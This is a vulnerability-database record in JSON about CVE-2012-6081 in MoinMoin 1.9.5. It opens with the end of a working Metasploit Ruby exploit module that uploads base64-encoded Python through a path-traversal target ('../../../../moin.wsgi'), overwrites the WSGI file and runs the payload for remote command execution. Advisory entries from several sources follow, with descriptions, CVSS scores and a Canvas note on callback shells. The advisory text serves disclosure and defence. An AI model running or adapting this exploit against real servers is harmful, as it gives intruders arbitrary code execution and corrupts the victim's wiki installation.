post_data.to_s.gsub(/^\\r\\n\\-\\-\\_Part\\_/, '--_Part_')\r\n\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(@base, @page),\r\n 'cookie' => session,\r\n 'vars_get' =>\r\n {\r\n 'action' => 'twikidraw',\r\n 'do' => 'save',\r\n 'ticket' => ticket,\r\n 'target' => '../../../../moin.wsgi'\r\n },\r\n 'data' => my_data,\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\"\r\n })\r\n\r\n if not res or res.code != 200 or not res.body.empty?\r\n vprint_error(\"Error uploading the payload\")\r\n return nil\r\n end\r\n\r\n return true\r\n end\r\n\r\n def check\r\n @base = target_uri.path\r\n @base << '/' if @base[-1, 1] != '/'\r\n\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(@base)\r\n })\r\n\r\n if res and res.code == 200 and res.body =~ /moinmoin/i and res.headers['Server'] =~ /Apache/\r\n return Exploit::CheckCode::Detected\r\n elsif res\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n def writable_page?(session)\r\n\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(@base, @page),\r\n 'cookie' => session,\r\n })\r\n\r\n if not res or res.code != 200 or res.body !~ /Edit \\(Text\\)/\r\n return false\r\n end\r\n\r\n return true\r\n end\r\n\r\n\r\n def exploit\r\n\r\n # Init variables\r\n @page = datastore['WritablePage']\r\n\r\n @base = target_uri.path\r\n @base << '/' if @base[-1, 1] != '/'\r\n\r\n # Login if needed\r\n if (datastore['USERNAME'] and\r\n not datastore['USERNAME'].empty? and\r\n datastore['PASSWORD'] and\r\n not datastore['PASSWORD'].empty?)\r\n print_status(\"Trying login to get session ID...\")\r\n session = do_login(datastore['USERNAME'], datastore['PASSWORD'])\r\n else\r\n print_status(\"Using anonymous access...\")\r\n session = \"\"\r\n end\r\n\r\n # Check authentication\r\n if not session\r\n fail_with(Exploit::Failure::NoAccess, \"Error getting a session ID, check credentials or WritablePage option\")\r\n end\r\n\r\n # Check writable permissions\r\n if not writable_page?(session)\r\n fail_with(Exploit::Failure::NoAccess, \"There are no write permissions on #{@page}\")\r\n end\r\n\r\n # Upload payload\r\n print_status(\"Trying to upload payload...\")\r\n python_cmd = \"import os\\nos.system(\\\"#{Rex::Text.encode_base64(payload.encoded)}\\\".decode(\\\"base64\\\"))\"\r\n res = upload_code(session, \"exec('#{Rex::Text.encode_base64(python_cmd)}'.decode('base64'))\")\r\n if not res\r\n fail_with(Exploit::Failure::Unknown, \"Error uploading the payload\")\r\n end\r\n\r\n # Execute payload\r\n print_status(\"Executing the payload...\")\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(@base, @page),\r\n 'cookie' => session,\r\n 'vars_get' => {\r\n 'action' => 'AttachFile'\r\n }\r\n }, 5)\r\n\r\n end\r\n\r\nend\n\n# 0day.today [2018-03-17] #", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/20906"}], "dsquare": [{"lastseen": "2019-05-29T15:31:57", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-6081"], "description": "Remote command execution vulnerability in MoinMoin twikidraw action\n\nVulnerability Type: Remote Command Execution", "modified": "2013-02-08T00:00:00", "published": "2013-02-08T00:00:00", "id": "E-311", "href": "", "type": "dsquare", "title": "MoinMoin 1.9.5 RCE", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2020-10-15T02:27:56", "description": "This module exploits a vulnerability in MoinMoin 1.9.5. The vulnerability exists on the manage of the twikidraw actions, where a traversal path can be used in order to upload arbitrary files. Exploitation is achieved on Apached/mod_wsgi configurations by overwriting moin.wsgi, which allows to execute arbitrary python code, as exploited in the wild on July, 2012. This module is \"ManualRanking,\" and the user is warned to use this module at his own risk since it will overwrite the moin.wsgi file, required for the correct working of the MoinMoin wiki. While the exploit will try to restore the attacked application at post exploitation, successful restoration cannot be guaranteed.\n", "published": "2013-06-17T21:13:55", "type": "metasploit", "title": "MoinMoin twikidraw Action Traversal File Upload", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-6081"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/UNIX/WEBAPP/MOINMOIN_TWIKIDRAW", "href": "", "sourceData": "", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/moinmoin_twikidraw.rb"}], "seebug": [{"lastseen": "2017-11-19T17:47:11", "description": "BUGTRAQ ID: 57082\r\nCVE(CAN) ID: CVE-2012-6081\r\n\r\nMoinMoin\u662f\u4e00\u4e2a\u57fa\u4e8ePython\u73af\u5883\u7684wiki\u5f15\u64ce\u7a0b\u5e8f\uff0c\u652f\u6301\u5305\u62ec\u4e2d\u6587\u5728\u5185\u7684\u591a\u8bed\u79cd\u7279\u6027\u3002\r\n\r\nMoinMoin 1.9.6\u4e4b\u524d\u7248\u672c\u4e2d twikidraw (action/twikidraw.py) \u3001anywikidraw (action/anywikidraw.py) \u811a\u672c\u5b58\u5728\u591a\u4e2a\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\uff0c\u53ef\u5141\u8bb8\u5177\u6709\u5199\u6743\u9650\u7684\u3001\u7ecf\u8fc7\u8eab\u4efd\u9a8c\u8bc1\u7684\u8fdc\u7a0b\u653b\u51fb\u8005\u901a\u8fc7\u4e0a\u4f20\u5e26\u6709\u53ef\u6267\u884c\u6269\u5c55\u540d\u7684\u6587\u4ef6\uff0c\u7136\u540e\u76f4\u63a5\u8bf7\u6c42\u8be5\u6587\u4ef6\uff0c\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\n0\nMoinMoin Wiki Engine 1.9.3\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMoinMoin\r\n--------\r\n\u76ee\u524d\u5382\u5546\u8fd8\u6ca1\u6709\u63d0\u4f9b\u8865\u4e01\u6216\u8005\u5347\u7ea7\u7a0b\u5e8f\uff0c\u6211\u4eec\u5efa\u8bae\u4f7f\u7528\u6b64\u8f6f\u4ef6\u7684\u7528\u6237\u968f\u65f6\u5173\u6ce8\u5382\u5546\u7684\u4e3b\u9875\u4ee5\u83b7\u53d6\u6700\u65b0\u7248\u672c\uff1a\r\n\r\nhttp://moinmo.in/", "published": "2013-01-05T00:00:00", "title": "MoinMoin action/twikidraw.py\u548caction/anywikidraw.py\u4efb\u610f\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-6081"], "modified": "2013-01-05T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60555", "id": "SSV:60555", "sourceData": "", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}], "canvas": [{"lastseen": "2019-05-29T19:48:25", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-6495"], "description": "**Name**| moinmoin_rce \n---|--- \n**CVE**| CVE-2012-6495 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| moinmoin_rce \n**Notes**| CVE Name: CVE-2012-6495 \nVENDOR: http://moinmoi.in \nNOTES: \nThis version of the exploit forces a callback by overwriting moin.wsgi. This makes it a one-shot exploit, and if \nit fails, will result in the remote MoinMoin install being corrupt. Make sure you set your callback IP address \nappropriately. Manually refreshing your browser may open up new listener shells even after the exploit has been run. \n \nRepeatability: One-shot \nCVE URL: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-6495 \nCVSS: 6 \n\n", "edition": 3, "modified": "2013-01-03T01:55:00", "published": "2013-01-03T01:55:00", "id": "MOINMOIN_RCE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/moinmoin_rce", "title": "Immunity Canvas: MOINMOIN_RCE", "type": "canvas", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:41", "bulletinFamily": "unix", "cvelist": ["CVE-2012-6082", "CVE-2012-6080", "CVE-2012-6081"], "description": "\nMoinMoin developers report the following vulnerabilities\n\t as fixed in version 1.9.6:\n\n\nremote code execution vulnerability in\n\t twikidraw/anywikidraw action,\npath traversal vulnerability in AttachFile action,\nXSS issue, escape page name in rss link.\n\n\nCVE entries at MITRE furher clarify:\n\nMultiple unrestricted file upload vulnerabilities in the\n\t (1) twikidraw (action/twikidraw.py) and (2) anywikidraw\n\t (action/anywikidraw.py) actions in MoinMoin before 1.9.6\n\t allow remote authenticated users with write permissions to\n\t execute arbitrary code by uploading a file with an\n\t executable extension, then accessing it via a direct request\n\t to the file in an unspecified directory, as exploited in the\n\t wild in July 2012.\n\n\nDirectory traversal vulnerability in the\n\t _do_attachment_move function in the AttachFile action\n\t (action/AttachFile.py) in MoinMoin 1.9.3 through 1.9.5\n\t allows remote attackers to overwrite arbitrary files via a\n\t .. (dot dot) in a file name.\n\n\nCross-site scripting (XSS) vulnerability in the rsslink\n\t function in theme/__init__.py in MoinMoin 1.9.5 allows\n\t remote attackers to inject arbitrary web script or HTML\n\t via the page name in a rss link.\n\n", "edition": 4, "modified": "2013-01-06T00:00:00", "published": "2012-12-29T00:00:00", "id": "A264B1B0-5726-11E2-9483-14DAE938EC40", "href": "https://vuxml.freebsd.org/freebsd/a264b1b0-5726-11e2-9483-14dae938ec40.html", "title": "moinmoin -- Multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}]}